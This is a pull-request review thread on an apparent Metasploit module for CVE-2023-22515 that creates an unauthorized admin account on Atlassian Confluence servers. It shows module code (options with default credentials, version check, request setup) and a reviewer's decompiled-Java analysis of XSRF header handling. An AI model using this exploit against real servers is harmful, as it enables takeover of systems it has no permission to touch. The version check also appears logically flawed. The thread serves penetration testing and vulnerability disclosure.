modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb

```diff
@@ -0,0 +1,131 @@
+        'Description' => %q{
+          This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.
+          A specially crafted request can be create new admin account without authorization in the Atlassian server.
+        },
+        'Author' => [
+          'Unknown', # exploited in the wild
+          'Emir Polat' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-22515'],
+          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515']
+        ],
+        'DisclosureDate' => '2023-10-04',
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', 'admin_1337']),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', 'admin_1337']),
+      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', 'admin_1337@localhost.com'])
+    ])
+  end
+
+  def check
+    confluence_version = get_confluence_version
+    return Exploit::CheckCode::Unknown unless confluence_version
+
+    vprint_status("Detected Confluence version: #{confluence_version}")
+
+    unless (confluence_version < Rex::Version.new('8.3.3')) && Rex::Version.new('8.4.3') && Rex::Version.new('8.5.2')
+      return Exploit::CheckCode::Safe("Patched Confluence version #{confluence_version} detected.")
+    end
+
+    Exploit::CheckCode::Vulnerable("Confluence version: #{confluence_version}")
+  end
+
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
+  def run
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
```

Comment:
Same as above.

Reply:
No, these are necessary for a explotation.

Reply:
The `X-Atlassian-Token` header is not required for the `server-info.action` endpoint. If we decompile the `ServerInfoAction` class:

```java
package com.atlassian.confluence.core.actions;

import com.atlassian.annotations.security.XsrfProtectionExcluded;
import com.atlassian.confluence.core.ConfluenceActionSupport;
import com.atlassian.confluence.security.access.annotations.PublicAccess;
import com.atlassian.xwork.HttpMethod;
import com.atlassian.xwork.PermittedMethods;

public class ServerInfoAction extends ConfluenceActionSupport {
  @PermittedMethods({HttpMethod.ANY_METHOD})
  @XsrfProtectionExcluded // <---
  @PublicAccess
  public String execute() throws Exception {
    return "success";
  }
}
```

We can see it annotated with `@XsrfProtectionExcluded`. If we then decompile `com.atlassian.xwork.interceptors.XsrfTokenInterceptor` which intercepts HTTP requests and enforces the XSRF checks, we can see that classes annotated with `@XsrfProtectionExcluded` are exempt from the checks.

```java
  public String intercept(ActionInvocation invocation) throws Exception {
    Method invocationMethod = extractMethod(invocation);
    String configParam = (String)invocation.getProxy().getConfig().getParams().get("RequireSecurityToken");
    RequireSecurityToken legacyAnnotation = invocationMethod.<RequireSecurityToken>getAnnotation(RequireSecurityToken.class);
    XsrfProtectionExcluded annotation = invocationMethod.<XsrfProtectionExcluded>getAnnotation(XsrfProtectionExcluded.class); // <---
    boolean isProtected = methodRequiresProtection(configParam, annotation, legacyAnnotation);
    String token = ServletActionContext.getRequest().getParameter("atl_token");
    boolean validToken = this.tokenGenerator.validateToken(ServletActionContext.getRequest(), token);
    if (isProtected && !validToken) {// <---
      Action action = (Action)invocation.getAction();
      String errorMessageKey = (token == null) ? "atlassian.xwork.xsrf.notoken" : "atlassian.xwork.xsrf.badtoken";
      addInvalidTokenError(action, errorMessageKey);
      ServletActionContext.getResponse().setStatus(403);
      return "input";
    } 
    return invocation.invoke();
  }

  private boolean methodRequiresProtection(String configParam, XsrfProtectionExcluded annotation, RequireSecurityToken legacyAnnotation) {
    if (isOverrideHeaderPresent())
      return false; 
    if (annotation != null)
      return false;  //<---
    if (configParam != null)
      return Boolean.parseBoolean(configParam); 
    if (legacyAnnotation != null)
      return legacyAnnotation.value(); 
    return getSecurityLevel().getDefaultProtection();
  }
```

We can still pass the header, but it is not required. Other action endpoints will require the header, but not `server-info.action`

Reply:
Hi @sfewer-r7 

Yeah, that's right. I removed the X-Atlassian-Token header from the requests to server-info.action and login.action endpoints and the exploit worked properly again. 

Commit: 62e1a1244ff2d7286b1f162192cfaa28e9f89a3b

Reply:
Awesome, thank you.